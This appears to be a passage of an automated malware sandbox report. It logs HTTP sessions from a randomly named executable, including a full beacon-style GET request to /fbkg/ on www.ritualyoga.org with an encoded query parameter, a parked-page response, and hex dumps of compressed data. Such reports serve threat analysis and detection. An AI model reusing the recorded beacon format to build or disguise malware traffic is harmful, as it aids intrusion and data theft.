                                                                                                                                                                                                Data Raw: 31 42 33 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 67 93 e3 46 96 36 fa 7d 7e 05 b6 27 ee 76 6b 57 6a 78 a7 91 b4 01 c2 10 86 16 04 08 90 13 13 5a 80 b0 84 f7 66 de fd ef 37 49 96 ed 96 66 b4 d2 7b 3f dc 88 e9 8a ee 66 01 69 4e 9e 3c 2e cf 79 b2 ea 87 7f 13 b6 bc 71 da 89 50 d4 66 e9 4f 7f fa e1 f6 1f 94 3a 79 f8 e3 07 3f ff 70 7b e0 3b de 4f 7f 82 a0 1f 32 bf 75 a0 4b e4 d4 8d df fe f8 a1 6b 83 ef 98 0f 10 7c 7f d5 c6 6d ea ff c4 5d da b8 c8 21 be c8 db ba 48 53 bf fe 1e 12 c7 8b 5f de 9f 5e 9c 2e 8c da 1f e0 47 d3 5b a7 a6 9d 40 27 f0 09 82 dc c2 9b a0 bf df 3f 82 6f 9c 4b 12 d6 45 97 7b df 5d 8a b4 00 a3 fc 59 e2 6e 5f 7f 79 6a f0 fc 14 c7 f1 e7 47 99 53 87 71 fe 3d 84 94 e3 e3 d1 ff fc e9 65 e0 6f a1 f2 5b a8 48 bf 85 3a f0 b7 f5 5e e6 09 00 9d df 05 4e 16 a7 d3 f7 50 e4 a7 bd df c6 17 e7 5b a8 f7 6b cf c9 c1 07 a7 8e 1d d0 a5 71 f2 e6 bb c6 af e3 e0 79 b6 7b cf 26 9e fd ef 01 b9 28 fe 3c 27 04 a5 71 ee 7f 17 f9 31 58 e9 f7 10 ca 7c 41 4c 59 fb ef 27 7f 0c 81 a2 af 03 0c 51 dc fa df 35 a5 73 01 63 83 f6 df 0d b5 53 be 5b 11 78 f8 d9 2d c6 57 6e 15 b5 77 e3 34 18 04 6a 8a 34 f6 a0 3f 8b a2 f8 4c 69 e9 78 5e 9c 87 e0 f5 0b 67 20 e8 2b 66 41 d0 10 7b 6d f4 3d c4 92 5f d2 7c db 7d bf 7e 99 ed 65 43 10 09 7c 3d cf f2 ba 63 60 af 78 12 93 30 e2 2b 02 90 cf a4 9f 41 e8 ed df 77 eb 89 d0 97 c1 5f e8 fa 8c 81 a6 2f a3 bf 67 ea 67 f4 79 00 08 7a b3 0f a0 c7 fb 61 b1 af 68 7e 4f d8 bb 51 31 f2 8b ad fa ec 01 61 8f d3 e6 1f b1 59 40 6e 5f 2f 3c b8 ef c3 77 b5 e3 c5 5d f3 3d 44 bc ee e9 f3 b2 00 e1 af f2 09 41 5e dc 94 a9 03 44 cf 4d 8b 4b f2 3c cc f3 46 d0 5f 6e c4 e7 a6 cb c0 48 af 6a f2 b2 b5 a0 25 84 be 2c e0 a6 4c 77 4a dc a2 6d 8b ec 9d 60 bc a7 f8 97 08 78 52 9b 97 e5 bf 15 d9 e7 75 7c 35 d5 f7 50 5e e4 fe 3b f6 ff f9 02 54 c4 01 da f0 2a 3a 40 68 6f 3a 73 97 c6 17 12 9f b4 f5 45 00 51 04 f9 7f be 16 9d 5f 10 9b cf 4d d1 d5 17 1f fa 8f af a5 e7 95 f3 2f 2c fa d2 2c 3c f7 fe fb b3 c9 f9 5a 89 04 f6 f6 f5 b2 bb 2f 36 09 48 b8 c8 df be 7e c3 8e 3d 48 7c cb c3 77 fa f8 56 1a 1e 1c f9 05 4e 3e 93 fa d9 73 80 f9 7d 26 f8 8d e4 33 af 1c 2b 80 e9 0a d2 62 f8 1e 72 ba b6 f8 9a f6 57 7b 2a 49 ef b6 eb 73 9c 07 c5 cb e0 af 6c fb 4a 5b df 53 f3 f9 a6 44 3f e7 5d e6 fa f5 1b 55 f9 da 7e bf e7 d8 b3 11 e1 b8 17 93 fe ca 17 a0 24 af b3 be 08 73 fd 64 52 5f 8d 9c 20 08 cf 0b 6c fd b1 fd ce 49 e3 10 38 80 7b c3 f7 6b bb 11 f9 e5 da be 4b fd e0 66 a2 df 58 c5 2f 4d ef d7 83 7c 1f dd 18 fc 6a 12 be 5e a7 44 dd be be ee f9 d9 01 ae b1 7f a5 e2 97 5c 9c c4 83 3f ef bb 46 b1 e7 f9 f9 cb 84 2f 0a fb 95 ba 01 c1 80 9e b9 ca 32 08 8b 90 7f 81 fe e7 2e db ce f7 7d dc 00 9f 02 dc de 4b 0b 8a a2 5e 5e 7f 6e 6b e0 6b be 0b 6a 27 f3 c1 16 fe 62 9b e7 75 bf bc 7c b2 a4 cf 53 bc 1b e3 73 e3 a7 fe e5 fd 84 8f f6 a0 f9 93 ba fd 19 78 f7 d6 ff b9 75 dc f4 99 27 2f b6 ff c1 81 27 03 01 d6 94 3a 65 03 7c e1 f3 a7 db eb fb 38 ef c6 68 6f 6e 0a 6a 9f f7 e6 0b 0b 88 bd 4a 8d e7 79 ff 78 04 e0 5b 6f 66 f3 89 e7 5f 0c f4 cc f7 5f 27 e0 b9 7b 1b 3d 8d f0 85 c2 3f 56 f7 de a3 3d d9 d3 df 34 68 9c 97 5d
                                                                                                                                                                                                Data Ascii: 1B35gF6}~'vkWjxZf7If{?fiN<.yqPfO:y?p{;O2uKk|m]!HS_^.G[@'?oKE{]Yn_yjGSq=eo[H:^NP[kqy{&(<'q1X|ALY'Q5scS[x-Wnw4j4?Lix^g +fA{m=_|}~eC|=c`x0+Aw_/ggyzah~OQ1aY@n_/<w]=DA^DMK<F_nHj%,LwJm`xRu|5P^;T*:@ho:sEQ_M/,,<Z/6H~=H|wVN>s}&3+brW{*IslJ[SD?]U~$sdR_ lI8{kKfX/M|j^D\?F/2.}K^^nkkj'bu|Ssxu'/':e|8honjJyx[of__'{=?V=4h]
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723241091 CET794INData Raw: fb e7 c6 77 ea cb f3 0c df 0d be 9b c4 40 01 ca 12 3c 76 f2 5b e4 70 d3 88 20 f6 d3 5f 5b ec 3d de fa 35 76 bd 89 24 7e 9d 5d 4f 23 7c 9f b7 d1 77 97 28 4e bd 4f 85 e7 7d f3 cc b6 b7 d6 32 c0 6e 5f bf c2 f5 db 30 9f fd 11 a8 c7 cf 99 d3 5e 22 bf
                                                                                                                                                                                                Data Ascii: w@<v[p _[=5v$~]O#|w(NO}2n_0^"y|5a[Y@k;)0)>"`R?f~}W. t=twbHx7##S(~\layP[!e!/e~~VL
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723306894 CET796INData Raw: 05 fb e5 49 5b e0 79 1c ef e7 b2 28 d2 bb e8 e2 0f 4d 79 99 19 44 aa 43 fe f3 a3 d5 7b 12 5e 8e 6c ff 30 ea 7e 39 18 fc 2b e0 fe 27 27 80 7f 05 dc 6f 22 fd 7f 05 dc a0 90 f1 0f 4e 00 ff 0a b8 ff c8 c9 f8 5f 01 f7 2d 9f 73 cf 5a fc 2b e0 fe 57 c0
                                                                                                                                                                                                Data Ascii: I[y(MyDC{^l0~9+''o"N_-sZ+W"?DJ3;RSN^fU-_)'67o{!|p[58@_/S~{`Cn#0qrMDSpg5Rp<nt}N
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723407984 CET797INData Raw: 08 38 d6 37 a3 3e bb bf 67 a7 77 27 0a ac e7 16 9d a9 87 ed e6 e1 a8 6e 56 f0 66 f6 e2 bc 2f 12 ff 5e cf bf a1 85 c1 0d 0d 60 96 1e 6b 7b bf 1a d0 fd d6 fb 13 30 af e0 ae 4a 77 b9 95 03 5e c9 ba 05 a3 63 54 83 dd c9 fd 01 b2 d7 2b 19 58 72 fd 51
                                                                                                                                                                                                Data Ascii: 87>gw'nVf/^`k{0Jw^cT+XrQ&}AE>&%l.6s?B|s'O7B?`U?:ER\M{+]={?uI/V~y{[B}En[pS{>7{
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723475933 CET798INData Raw: 13 88 05 ca 9f 1e b0 fb bf 3f 2e 78 18 94 f2 f8 70 3f 2e 83 19 1e df 89 d9 4a d7 c2 2d 3a 4a f5 72 4d 86 3c 37 e6 ec 35 5c 79 66 71 59 b1 5b 89 5d 51 63 a2 91 83 96 28 ed 20 41 87 cd 71 ec 2f 51 20 74 12 5b 8a 87 59 53 97 71 e7 12 c7 91 45 c4 63
                                                                                                                                                                                                Data Ascii: ?.xp?.J-:JrM<75\yfqY[]Qc( Aq/Q t[YSqEc)+]2sli'8 mL5ZfD_YSX^tvIAU%r;qa8l9KiU9l}+^? h(Zw:.P}S@(Ku
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723536015 CET799INData Raw: a5 59 67 c3 cd a1 96 35 24 82 92 13 0e 8d 30 5f ed cf 0a 6b 8c 1e bc f2 74 03 ef f7 bd 47 a9 72 cd 10 25 c7 e9 47 6f 83 96 84 a0 ec 35 a9 68 ce 48 80 22 1b da 72 5b 04 0d 60 75 92 52 e0 4a 98 2d cc 6d 50 f6 b2 48 71 82 9a 58 67 77 f2 81 55 3f 4d
                                                                                                                                                                                                Data Ascii: Yg5$0_ktGr%Go5hH"r[`uRJ-mPHqXgwU?Mb)6{&;$stCjg38, WVUb>CaxlrmiRw~Z/tFCKg=nm~Wi+xleWPu[Sa\MVl2Hj,xd'Z|c
                                                                                                                                                                                                Nov 17, 2023 19:29:51.723745108 CET800INData Raw: 34 44 35 0d 0a 6a 96 ce 06 46 21 43 43 8e 18 35 48 c0 f2 52 85 4b 2e a4 6d 10 b8 92 d5 e9 9b 1d 42 49 99 5f 93 31 b8 8e 40 34 fd 88 2c d4 4b c1 71 cc 02 a2 7b 44 f2 74 d3 d0 16 bd 3b f9 be ef ed 43 71 f6 9a e6 62 45 9d 34 ce 02 9b af e5 85 d3 55
                                                                                                                                                                                                Data Ascii: 4D5jF!CC5HRK.mBI_1@4,Kq{Dt;CqbE4UC'$,H{G>u'%k9YKx[ZA}G0*T6(j~`9L"_ay9f*VaDSCvczrgWgL
                                                                                                                                                                                                Nov 17, 2023 19:29:51.726610899 CET802INData Raw: 32 37 39 32 0d 0a 71 22 31 93 1b 3b cf 0e 22 45 cb f5 79 8a d6 8b 56 5b 1e 33 52 9a aa ed a5 e8 80 c5 12 f5 e5 04 d5 15 74 4e 1b cd 66 53 36 db 5d dc 6c 0c 0d 12 18 26 e3 80 ca 78 5a 26 e6 8e 47 bd e3 b5 22 d9 d4 0e 6b 76 35 67 0b 1b 84 e6 d2 35
                                                                                                                                                                                                Data Ascii: 2792q"1;"EyV[3RtNfS6]l&xZ&G"kv5g5)DqVUmr1&~iOm[o |&Lhc+MYOgo)} a3I'Wa%et&b@uDyiQ]e*KeGm23#:uvnY'=z-
                                                                                                                                                                                                Nov 17, 2023 19:29:51.726707935 CET803INData Raw: 55 7b ac a4 52 db a9 e7 eb 91 db 37 18 d2 e2 b4 79 8d 5b d3 0a 4a ab 8f 09 37 a2 3b 52 0c 92 76 13 d6 74 75 75 83 d2 e4 fd f3 4e 5c c4 7b 7f ee cf 14 a3 ae c3 a9 e7 ae 91 c0 02 b3 de 43 67 c5 11 95 58 1e 26 1e 1d 2e cd 25 f1 a2 21 b4 77 ba a1 83
                                                                                                                                                                                                Data Ascii: U{R7y[J7;RvtuuN\{CgX&.%!w]W&GH=WCWtAd:J:cxhp<qS2m7Ut7+}Gh>*KZ~6'pUf*n#]pLr$WZV$<'XG. ZR+dQpeh <.XNB#"H
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837210894 CET805INData Raw: 86 f3 ce 09 b6 0d 6b 87 cc 31 89 c3 70 e9 d9 e2 2e 97 4e 84 9e d5 19 51 59 ca 8e c4 87 6e 2b ef 9a 28 ca a3 68 01 82 bc 12 5e 72 e1 55 c4 2f b8 a1 1f 20 15 32 ce 33 bf 4a 16 98 9c aa d7 dd 91 b7 f8 e2 20 76 09 b4 e7 06 8c 19 f7 a7 4c 26 d0 b1 c3
                                                                                                                                                                                                Data Ascii: k1p.NQYn+(h^rU/ 23J vL&r% LtO!q0`Gtu,V 0uuD |%Rurwkx|)s:P[\&'i\rXs,&H'`PJjU0Z_aBWu!uYqpRR;q\8A.
                                                                                                                                                                                                Nov 17, 2023 19:29:51.837316990 CET806INData Raw: f3 04 5c 69 37 cb 28 17 6d a1 a3 80 aa 56 d5 1b f0 81 87 3b 07 b3 58 7a da a0 6a 7a 09 10 59 30 b2 13 72 b1 f9 2e d3 88 f3 86 81 f8 7d 8c ea a1 92 04 e0 47 14 31 6a 5f 46 10 9b c4 5a 98 59 ae ee 42 8e 1c 95 f3 46 db d7 a9 28 c2 e7 42 be a6 9e 56
                                                                                                                                                                                                Data Ascii: \i7(mV;XzjzY0r.}G1j_FZYBF(BV=K\>^n'2JbK45/\x5H: EUbf\#IRm^T3nXg0qd-{z2[nXv5


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                34192.168.11.2050161216.40.34.4180C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:53.807573080 CET841OUTGET /fbkg/?T6I=JkjxJVy7+VXqa4gzNBPrmSWPXfQ7ycJIKM5SFrEbg6dYWeaIdA23wJ7qOttvdhiZexnFzUpO5XAbvrWtFrekBpAEzqUmGc3/RA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ritualyoga.org
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942323923 CET842INHTTP/1.1 200 OK
                                                                                                                                                                                                server: nginx/1.14.2
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:29:53 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                x-permitted-cross-domain-policies: none
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                etag: W/"cd0e473ec8f9e0891230436de0f95a52"
                                                                                                                                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                x-request-id: d838bf56-8438-4229-926c-db79c0b7e99b
                                                                                                                                                                                                x-runtime: 0.017620
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 31 37 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 3a 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 3d 27 20 72 65 6c 3d 27 69 63 6f 6e 27 3e 0a 3c 74 69 74 6c 65 3e 72 69 74 75 61 6c 79 6f 67 61 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 66 37 65 37 66 33 30 64 38 31 32 64 30 66 33 39 35 30 39 31 38 63 37 35 36 32 64 66 37 65 36 38 65 65 65 65 62 64 38 36 34 39 62 64 65 61 32 62 63 33 38 34 34 65 62 30 37 66 63 38 32 36 39 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                                                                                                                                Data Ascii: 1755<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>ritualyoga.org is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942445993 CET844INData Raw: 68 6f 76 65 72 2e 63 6f 6d 2f 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61
                                                                                                                                                                                                Data Ascii: hover.com/?source=parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>ritualyoga.org</h1><h2>is a totally awesome idea still being
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942508936 CET845INData Raw: 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77
                                                                                                                                                                                                Data Ascii: "https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></u
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942732096 CET846INData Raw: 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39 2e 32 34 33 34 34 2c 2d 31 2e 34 36 37 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e
                                                                                                                                                                                                Data Ascii: 359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.1
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942802906 CET848INData Raw: 4d 37 36 38 20 31 32 37 30 20 71 2d 37 20 30 20 2d 37 36 2e 35 20 30 2e 35 74 2d 31 30 35 2e 35 20 30 74 2d 39 36 2e 35 20 2d 33 74 2d 31 30 33 20 2d 31 30 74 2d 37 31 2e 35 20 2d 31 38 2e 35 71 2d 35 30 20 2d 32 30 20 2d 38 38 20 2d 35 38 74 2d
                                                                                                                                                                                                Data Ascii: M768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942847967 CET848INData Raw: 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 20 20 0a 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41
                                                                                                                                                                                                Data Ascii: nt,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                34216.40.34.4180192.168.11.2050161C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:53.807573080 CET841OUTGET /fbkg/?T6I=JkjxJVy7+VXqa4gzNBPrmSWPXfQ7ycJIKM5SFrEbg6dYWeaIdA23wJ7qOttvdhiZexnFzUpO5XAbvrWtFrekBpAEzqUmGc3/RA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.ritualyoga.org
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942323923 CET842INHTTP/1.1 200 OK
                                                                                                                                                                                                server: nginx/1.14.2
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:29:53 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                x-permitted-cross-domain-policies: none
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                etag: W/"cd0e473ec8f9e0891230436de0f95a52"
                                                                                                                                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                x-request-id: d838bf56-8438-4229-926c-db79c0b7e99b
                                                                                                                                                                                                x-runtime: 0.017620
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 31 37 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 3a 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 3d 27 20 72 65 6c 3d 27 69 63 6f 6e 27 3e 0a 3c 74 69 74 6c 65 3e 72 69 74 75 61 6c 79 6f 67 61 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 66 37 65 37 66 33 30 64 38 31 32 64 30 66 33 39 35 30 39 31 38 63 37 35 36 32 64 66 37 65 36 38 65 65 65 65 62 64 38 36 34 39 62 64 65 61 32 62 63 33 38 34 34 65 62 30 37 66 63 38 32 36 39 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                                                                                                                                Data Ascii: 1755<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>ritualyoga.org is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942445993 CET844INData Raw: 68 6f 76 65 72 2e 63 6f 6d 2f 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61
                                                                                                                                                                                                Data Ascii: hover.com/?source=parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>ritualyoga.org</h1><h2>is a totally awesome idea still being
